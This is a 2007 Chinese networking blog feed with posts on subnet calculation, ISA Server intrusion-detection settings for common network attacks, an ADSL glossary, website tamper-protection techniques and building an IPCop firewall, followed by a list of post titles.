网络地址:10.0.0.0;子网掩码255.255.0.0(/16)
1.子网数=2 的8次方-2=254
2.主机数=2 的16次方-2=65534
3. 有效子网?:block size=256-255=1，2，3，......; 所以第一个子网为10.1.0.0, 最后1 个为10.254.0.0
4.广播地址:下个子网-1.所以第一个子网和最后1 个子网的广播地址分别是10.1.255.255 和
10.254.255.255
5.有效主机范围是:第一个子网的主机地址是10.1.0.1 到10.1.255.254;最后1 个是10.254.0.1 到10.254.255.254

配置ISA Server检测外部攻击和入侵

noreply@blogger.com (Eric White) — Wed, 04 Jul 2007 03:30:00 +0000

可以通过配置ISA Server来检测常见的网络攻击。默认状态下，启用入侵检测后，ISA Server一检测到攻击，就会往Windows 2000事件日志中发消息。也可以把ISA Server配置为对检测到的攻击做出其他的反应，例如给管理员发送电子邮件、启动一个特定的程序、以及启动或停止选定的ISA Server服务。

　　4.6.1 入侵类型和警报

　　ISA Server的一个功能就是入侵检测。有人试图攻击您的网络时，入侵检测能够将其鉴别出来。检测到攻击(参见图4.14)后，ISA Server就会采取一系列预先配置的措施(或警报)。下面是一些入侵类型：

·端口扫描攻击

　　·IP 半扫描攻击

　　·登录攻击

　　·Ping of Death攻击

　　·UDP轰炸攻击

　　·Windows out-of-band攻击

　　4.6.2 端口扫描攻击

　　引发ISA Server警报的两种端口扫描攻击类型：全部端口扫描攻击和枚举端口扫描攻击。

　　4.6.2.1 全部端口扫描攻击

　　该警报通知您，有人试图访问的端口数目超过了您预先设定的数字。您可以规定一个极限值，指定允许访问的端口数目。

　　4.6.2.2 枚举端口扫描攻击

　　该警报通知您，有人通过探测每个端口的反应，试图统计计算机上所运行的服务。

　　如果有该警报，您应该识别端口扫描的来源。将它与目标计算机上运行的服务进行对比。同时，鉴别扫描的来源和目的。检查访问日志，看有没有未经授权的访问。如果确实发现了未经授权的访问，您应该考虑到这可能会危及系统的安全，并采取适当的措施。

　　4.6.3 IP 半扫描攻击

　　该警报通知您，有人一再试图访问目的计算机，但却没有传送相应的ACK(确认)数据包。

　　标准的TCP链接是通过给目的计算机发送一个SYN(同步/开始)数据包来建立的。如果该目的正在等待连接到某个端口，就会发送一个SYN/ACK (同步确认)数据包。最初的发送者回应一个ACK数据包，链接就建立起来了。如果该目的计算机的没有等待指定端口上的连接，就发送一个RST(重置)数据包。
多数的系统日志收到源头发送的最终的ACK数据包之后，才将该链接记入日志。发送的是RST数据包而不是最终的ACK数据包，说明该链接没有真正建立起来，因此它不会记入日志中。因为源头能够鉴别目的计算机发送的是SYN/ACK数据包，还是RST数据包，所以黑客能够精确地判断哪个端口是公开连接的，而且目的计算机意识不到这是黑客的探测行为。

　　如果发生了该警报，就将产生扫描的地址记入日志。适当的话，配置ISA Server策略规则或者IP数据包筛选器来阻止来自该扫描源的通信。

　　4.6.4 登录攻击

　　该警报通知您，发送的TCP SYN 数据包还带有与目的IP地址和端口匹配的伪源IP地址和端口数。如果该攻击成功了，它将使某些TCP执行程序陷入死循环而死机。

　　如果发生了该警报，配置ISA Server策略规则或者IP数据包筛选器使其禁止来自该扫描源头的通信。

　　4.6.5 Ping of Death攻击

　　该警报通知您，Internet控制报文协议(ICMP)的回应请求(ping)数据包中附加有大量的信息。如果该攻击成功了，它将使计算机的内核缓冲区溢出而死机。

　　如果发生了该警报，创建一个协议规则，明确地拒绝来自Internet的传入ICMP回应请求数据包。

　　4.6.6 UDP轰炸攻击

　　该警报通知您，有人试图给您发送非法的UDP数据包。这些UDP数据包的某些字段上有非法值。接收到这样的数据包时，会导致一些旧的操作系统崩溃。而一旦目标机器崩溃之后，通常就很难找出原因了。

　　4.6.7 Windows Out-of-Band攻击(WinNuke)

　　该警报通知您，有人试图通过OOB denial-of service(拒绝服务)攻击一台由ISA Server保护的计算机。如果该攻击成功了，它将导致计算机崩溃或者导致某些易受攻击的计算机失去网络链接。

　　注意入侵检测功能是基于美国亚特兰大Internet安全系统公司(Internet Security Systems， Inc.， Atlanta， Georgia)的有关技术。

　　4.6.8 配置入侵检测

　　为了检测有害的入侵者，ISA Server将网络通信以及日志项与熟知的攻击方法进行比较。如发现可疑的行为会触发一组预先设定的措施或者警报。这些措施包括终止链接、终止服务、电子邮件警报、记入日志、以及运行一个选定的程序。

　　要启用这个功能，选择IP Packet Filters Properties对话框上的Enable Intrusion Detection复选框，如图4.15所示。

ISA Server包括一个为入侵检测预先配置的名为Intrusion Detected的警报，如图 4.16所示。默认状态下，启用入侵检测后，只要一检测到任何一种入侵类型，该警报就会往Windows 2000事件日志中发消息。也可以修改Intrusion Detected警报，让它在检测到入侵时，作出另外的响应。也可以创建一个新警报，当检测到一个特定的入侵类型时，作出其他可能的警报反应。另外，配置端口扫描警报时，可以设定触发警报的端口攻击数量。

按如下步骤配置入侵检测：

　　1.在ISA Management控制台树上，右击IP Packet Filters，然后单击Properties。

　　2.在General选项卡上，选中Enable Packet Filtering复选框(如果尚未选择它)，同时选定Enable Intrusion Detection复选框。

　　3.在Intrusion Detection选项卡中，单击能引起事件的攻击类型：

　　u Windows Out-Of-Band (WinNuke)

　　u 登录

　　u Ping of Death

　　u IP半扫描

　　u UDP轰炸

　　u 端口扫描

　　4.如果选择了Port Scan，那么执行以下步骤：

　　u 在Well-Known Ports文本框中，输入引起事件之前所能扫描的常用端口的最大号码。

　　u 在Ports文本框中，输入触发警报之前所能扫描的端口数目。

　　注意 Well-Known Ports(常用端口)就是从0到1023之间的任一端口。

　　4.6.10 小结

　　在ISA Management的IP数据包筛选属性对话框中启用入侵检测，可以把ISA Server配置为能够检测6种常见的网络攻击。这些攻击包括端口扫描攻击、IP半扫描攻击、登录攻击、Ping of Death攻击、UDP轰炸攻击以及Windows out-of-band (WinNuke)攻击。默认状态下，启用入侵检测，ISA Server只要检测到其中任何一种攻击，就会往Windows 2000事件日志中写信息。这些消息在事件观察器中就是警报。也可以配置ISA Server针对攻击做出其他的反应，例如给管理员发送电子邮件、启动一个特定的程序、或者启动或停止选定的ISA Server服务。

ADSL技术词典

noreply@blogger.com (Eric White) — Tue, 03 Jul 2007 04:37:00 +0000

ADSL虚拟拨号
在ADSL的数字线上进行拨号，不同于模拟电话线上用调制解调器的拨号，而采用专门的协议PPP over Ethernet，拨号后直接由验证服务器进行检验，用户需输入用户名与密码，检验通过后就建立起一条高速的用户数字；并分配相应的动态IP。虚拟拨号用户需要通过一个用户帐号和密码来验证身份，这个用户帐号和163帐号一样，都是用户申请时自己选择的，并且这个帐号是作了限制的，只能用于ADSL虚拟拨号，不能用于普通MODEM拨号。

ADSL专线接入
是ADSL接入方式中的另一种，不同于虚拟拨号方式，而是采用一种类似于专线的接入方式，用户连接和配置好ADSL MODEM后，在自己的PC的网络设置里设置好相应的TCP/IP协议及网络参数（IP和掩码、网关等都由局端事先分配好），开机后，用户端和局端会自动建立起一条链路。所以，ADSL的专线接入方式是以有固定IP、自动连接等特点的类似专线的方式，当然，它的速率比某些低速专线还快的多呢。

PPP over Ethernet（PPPoE）协议PPPoE是在以太网络中转播PPP帧信息的技术。通常PPP（point-to-point protocol）是用来通过电话线路及ISDN拨号接驳到ISP时使用。该协议具有用户认证及通知IP地址的功能。在ADSL中，PPPoE用来接驳ADSL Modem与家庭中的个人电脑或者路由器

PPP over ATM （PPPoA）协议
采用PPPoA的接入技术，由PC终端直接发起PPP呼叫，用户侧ATM25网卡在收到上层的PPP包后，根据RFC2364封装标准对PPP包进行AAL5层封装处理形成ATM信元流。ATM信元透过ADSL Modem传送到网络侧的宽带接入服务器上，完成授权、认证、分配IP地址和计费等一系列PPP接入过程。

Enternet 300 (Enternet100 Enternet500)美国Efficient Network开发的PPPoE软件，提供ADSL的PPPoE协议完成虚拟拨号上网工作

WinPoET
美国WindRiver开发的PPPoE软件，提供ADSL的PPPoE协议完成虚拟拨号上网工作.

RasPPPoE
德国个人开发的PPPoE软件，提供ADSL的PPPoE协议完成虚拟拨号上网工作.

上行
指从用户电脑向网络传送信息

下行
指浏览WWW网页、下载文件，速率最高可达8Mbps

Splitter分离器
ADSL MODEM用户分离电话线中普通电话语音信号和ADSL网络信号的前置设备，信号分离以后分别送往不同电话设备（电话机，传真机等）和ADSL MODEM

synchronization 同步
ADSL用户端与局端的ADSL网络信号连接过程，双方信号建立连接(同步)以后，ADSL才能使用

VPI(Virtual Path Identifier 虚路径标识符)
VCI(Virtual Channel Identifier 虚通道标识符)
VCI，VPI是DSLAM识别各ATM终端（ADSL线路）的标志。

学习最专业的网站服务器保护方法

noreply@blogger.com (Eric White) — Mon, 02 Jul 2007 04:49:00 +0000

一：网站的通用保护方法

　　针对黑客威胁，网络安全管理员采取各种手段增强服务器的安全，确保WWW服务的正常运行。象在Internet上的Email、ftp等服务器一样，可以用如下的方法来对WWW服务器进行保护：

　　安全配置

　　关闭不必要的服务，最好是只提供WWW服务，安装操作系统的最新补丁，将WWW服务升级到最新版本并安装所有补丁，对根据WWW服务提供者的安全建议进行配置等，这些措施将极大提供WWW服务器本身的安全。

　　防火墙

　　安装必要的防火墙，阻止各种扫描工具的试探和信息收集，甚至可以根据一些安全报告来阻止来自某些特定IP地址范围的机器连接，给WWW服务器增加一个防护层，同时需要对防火墙内的网络环境进行调整，消除内部网络的安全隐患。

　　漏洞扫描

　　使用商用或免费的漏洞扫描和风险评估工具定期对服务器进行扫描，来发现潜在的安全问题，并确保由于升级或修改配置等正常的维护工作不会带来安全问题。

　　入侵检测系统

　　利用入侵检测系统(IDS)的实时监控能力，发现正在进行的攻击行为及攻击前的试探行为，记录黑客的来源及攻击步骤和方法。

　　这些安全措施都将极大提供WWW服务器的安全，减少被攻击的可能性。

　　二：网站的专用保护方法

　　尽管采用的各种安全措施能防止很多黑客的攻击，然而由于各种操作系统和服务器软件漏洞的不断发现，攻击方法层出不穷，技术高明的黑客还是能突破层层保护，获得系统的控制权限，从而达到破坏主页的目的。这种情况下，一些网络安全公司推出了专门针对网站的保护软件，只保护网站最重要的内容--网页。一旦检测到被保护的文件发生了{非正常的}改变，就进行恢复。一般情况下，系统首先需要对正常的页面文件进行备份，然后启动检测机制，检查文件是否被修改，如果被修改就需要进行恢复。我们对以下几个方面的技术进行分析比较：

监测方式

　　本地和远程：检测可以是在本地运行一个监测端，也可以在网络上的另一台主机。如果是本地的话，监测端进程需要足够的权限读取被保护目录或文件。监测端如果在远端的话，WWW服务器需要开放一些服务并给监测端相应的权限，较常见的方式是直接利用服务器的开放的WWW服务，使用HTTP协议来监测被保护的文件和目录。也可利用其它常用协议来检测保护文件和目录，如FTP等。采用本地方式检测的优点是效率高，而远程方式则具有平台无关性，但会增加网络流量等负担。

　　定时和触发：绝大部分保护软件是使用的定时检测的方式，不论在本地还是远程检测都是根据系统设定的时间定时检测，还可将被保护的网页分为不同等级，等级高的检测时间间隔可以设得较短，以获得较好的实时性，而将保护等级较低的网页文件检测时间间隔设得较长，以减轻系统的负担。触发方式则是利用操作系统提供的一些功能，在文件被创建、修改或删除时得到通知，这种方法的优点是效率高，但无法实现远程检测。

　　比较方法

　　在判断文件是否被修改时，往往采用被保护目录和备份库中的文件进行比较，比较最常见的方式全文比较。使用全文比较能直接、准确地判断出该文件是否被修改。然而全文比较在文件较大较多时效率十分低下，一些保护软件就采用文件的属性如文件大小、创建修改时间等进行比较，这种方法虽然简单高效，但也有严重的缺陷：{恶意入侵者}可以通过精心构造，把替换文件的属性设置得和原文件完全相同，{从而使被恶意更改的文件无法被检测出来}。另一种方案就是比较文件的数字签名，最常见的是MD5签名算法，由于数字签名的不可伪造性，数字签名能确保文件的相同。

　　恢复方式

　　恢复方式与备份库存放的位置直接相关。如果备份库存放在本地的话，恢复进程必须有写被保护目录或文件的权限。如果在远程则需要通过文件共享或FTP的方式来进行，那么需要文件共享或FTP的帐号，并且该帐号拥有对被保护目录或文件的写权限。

　　备份库的安全

　　当黑客发现其更换的主页很快被恢复时，往往会激发起进一步破坏的欲望，此时备份库的安全尤为重要。网页文件的安全就转变为备份库的安全。对备份库的保护一种是通过文件隐藏来实现，让黑客无法找到备份目录。另一种方法是对备份库进行数字签名，如果黑客修改了备份库的内容，保护软件可以通过签名发现，就可停止WWW服务或使用一个默认的页面。

　　通过以上分析比较我们发现各种技术都有其优缺点，需要结合实际的网络环境来选择最适合的技术方案。

　　三：网站保护的缺陷

　　尽管网站保护软件能进一步提高系统的安全，仍然存在一些缺陷。首先这些保护软件都是针对静态页面而设计，而现在动态页面占据的范围越来越大，尽管本地监测方式可以检测脚本文件，但对脚本文件使用的数据库却无能为力。

　　另外，有些攻击并不是针对页面文件进行的，前不久泛滥成灾的"Red Code"就是使用修改IIS服务的一个动态库来达到攻击页面的目的。另一个方面，网站保护软件本身会增加WWW服务器的负载，在WWW服务器负载本身已经很重的情况下，一定好仔细规划好使用方案。

　　四：结论

　　本文讨论了网站常用的保护方法，详细地分析比较了专用网站保护软件采用的各种技术实现和优缺点，并指出了其缺陷。安全虽不是使用某个工具或某些工具就可以解决的，但使用这些工具能帮助提高安全性，减少安全风险。

防黑客不愁 DIY自己的防火墙设备

noreply@blogger.com (Eric White) — Sun, 01 Jul 2007 01:38:00 +0000

现在家庭中拥有计算机并连接到因特网上已经不是少数了，甚至许多家庭还拥有多台计算机。不过由于因特网的复杂，可能大部分用户都遭受过病毒侵入、黑客攻击和不明扫描等其他一些不安全因素的影响，如果有一台称手的硬件防火墙可供使用，那就大大地省事了。可现在市场上的硬件防火墙产品动辄就是以数千元计，对一般的家庭来说实在是不划算。其实，只要有一台以前淘汰下来能够使用的老机器，再安装基于Linux的免费防火墙产品就可实现这一目标了，对用户来说，在成本上的花费根本可以忽略不计。

　　现存，有很多基于Linux环境的路由器/防火墙软件可供选择，例如像有m0n0wall 、Smoothwall Express、LEAF-Bering uClibc和ClarkConnect等等，这次，我们把目光转向号称为“让不良数据包到此为止”的IPCop，主要给大家介绍怎样安装一台自己的IPCop硬件防火墙。

　　准备硬件平台

　　依照IPCop用户手册中的内容，这套软件最低硬件需求只要是一台安装有386处理器，32MB内存和一块300MB大小容量硬盘的“古董级”机器就行了。不过从系统的运行速度及稳定性方面考虑，笔者还是建议使用速度更快的硬件。一块奔腾（Pentium）家族的处理器再加上256MB的内存应当是能够表现得相当好的，而且使用一块20GB大小的硬盘还可以把它作为一台高效率的代理缓存计算机来使用。也不是说使用最新、配置最好的硬件它的性能就能表现得再好，使用最新的硬件平台可能会引起一些问题，主要是IPCop对新硬件产品的支持还不完善的缘故，例如对PCI Express技术的支持也还只刚起步，远还没达到完成与成熟的地步。

　　IPCop的标准配置至少需要一块网卡的支持，没有网卡的路由器我们还有称之为路由器吗？我们选择的是市面上基于Realtek 8139系列芯片的网卡，因为一种芯片极其广泛的应用实际上也是相当于保证了它能够得到更加广泛的驱动支持。在笔者给大家介绍的实例中，使用了两块网卡，这跟我们使用一台SOHO宽带路由器来共享ADSL或cable modem上网的具体网络结构是一样的（如图1所示）。在我们使用的这个网络中，一块网卡（第一块网卡）是连接到家用网络那一端的交换机上（用绿色的连接线表示），而它的另一块网卡（第二块网卡）则是直接连接到一台ADSL或是cable modem上的（用红色的连接线表示。实际上，一块ISDN卡或是一块传统的模拟modem卡也是可以用来代替它的第二块网卡的；另外，我们还可以增加更多的网卡来满足更复杂的需求。

　　 IPCop路由器的硬件需求

　　CPU/主板Intel或AMD的CPU，Pentium系列或更高级别，最小需要100 MHz的速度 (Socket 7， Socket 370， Socket A等等)内存256 MB SDRAM或DDR-SDRAM硬盘20 - 40 GB 用来用在代理模式下作网站缓存网卡两块10/100 Mbit/s网卡显卡随便一块2MB显存的卡，并不需要3D加速功能，只要能够安装上就行了光驱随便什么样的光驱都行，只要能够使用键盘随便哪一种键盘都行

　　安装软件系统

　　IPCop是基于Linux系统的，操作系统本身及它的源代码都是可自由使用的，只要遵循GPL许可协议，下载地址为http://www.ipcop.org/，格式是一个ISO的光盘映像文件，体积很小巧的，仅仅只能41 MB，把它刻录成一张启动光盘就可使用了，而且这个映像文件也可把它恢复到某个分区中来安装。在我们的这次安装中，担当路由器的计算机是从一个光驱并从光盘上安装整个系统。

　　在主板BIOS设置中把光驱作为第一启动设备后，保存设置，计算机重新启动，我们就可看到Isolinux的引导加载程序。在这要注意的是如果此项安装过程进行下去，会删除你硬盘中的所有数据，所以请大家要小心，在安装之前一定要备份重要的数据资料

　　按下回车键后将会加载Linux的内核。注意在这个地方还可以使用另外的两个参数“nousb”和“nopcmcia”，这两个选项参数实质上就是屏蔽主板上的USB接口和PCMCIA接口功能。一般情况下一台普通的路由器是根本就不需要这两种接口的。
操作系统的内核完成加载完成后，安装过程的第一步就是选择安装界面的语言版本，在这有几种不同的语言可用，不过好像没有找到有中文的选择项，那我们就选择英文吧。

　　接下来，安装程序会询问我们是希望从哪一个存储媒体介质中来进行安装，有CDROM和HTTP/FTP可供选择。如果你是从一个软驱引导系统的，那就能够选择HHTP/FTP方式，我们就选择CDROM这个选项。然后，虽说我们已经把安装光盘放到了光驱之中，但安装程序还是会提示要插入一张安装光盘，一定要确认一下才行。

　　当安装程序把这个硬盘进行重新分区并格式化后，真正的安装过程就开始了，整个根本不需要与用户交互，全部自动进行，如系统检查所使用的硬盘驱动器、对它进行分区操作，然后再使用适当的文件系统格式化新的分区等。不像其他的操作系统安装一样，安装程序会频繁地请求与询问用户有关安装的一些内容，像什么有关于交换分区的容量大小等。并且我们也不必去了解它的数据分区是使用ReiserFS或是ext3分区格式等。

　　如果以前已经安装过这样的系统，并把相关的配置信息都保存到了一张软盘上，安装达成后就可直接导入所有的配置信息，并跳过余下的配置过程，这可能为用户节省不少的时间。只要在图3所示的屏幕内容中选择“Restore”这个按钮就行了，然后让这个安装程序来完成剩下的工作。由于我们这次是新系统的安装，没有任何的配置信息可用，所以就只能选择“Skip”这个按钮了。系统的安装过程至此结束，接下来就是对IPCop进行设置了。

Eric's Tech Space

寝室熄灯后不用怕，从电话线“偷电”啦

blogspot今天居然能访问了

第三方控件安装方法

Windows 2003搭建安全服务器

编写漏洞扫描器方法

揭秘十大杀毒误区

解析不同存储环境下的数据保护策略

常见拒绝服务攻击类型及分析

关于病毒命名规则的说明

无法打开.exe可执行文件问题 解决方案

ADSL路由器防止黑客攻击

分布式防火墙的应用部署 外盗家贼一起防

WLAN安全锦囊妙计

网络协议：Ethereal协议分析系统介绍

屏蔽网络设置小技巧 保障网络参数安全

蓝牙技术在组建无线局域网中的应用

解决IP地址冲突的方法--DHCP SNOOPING

屏蔽网络设置小技巧 保障网络参数安全

权限保卫战——可怕的Rootkit

139/445端口与入侵win 2000主机

快速子网划分方法

配置ISA Server检测外部攻击和入侵

ADSL技术词典

学习最专业的网站服务器保护方法

防黑客不愁 DIY自己的防火墙设备

无法打开.exe可执行文件问题解决方案

分布式防火墙的应用部署外盗家贼一起防

屏蔽网络设置小技巧　保障网络参数安全

屏蔽网络设置小技巧　保障网络参数安全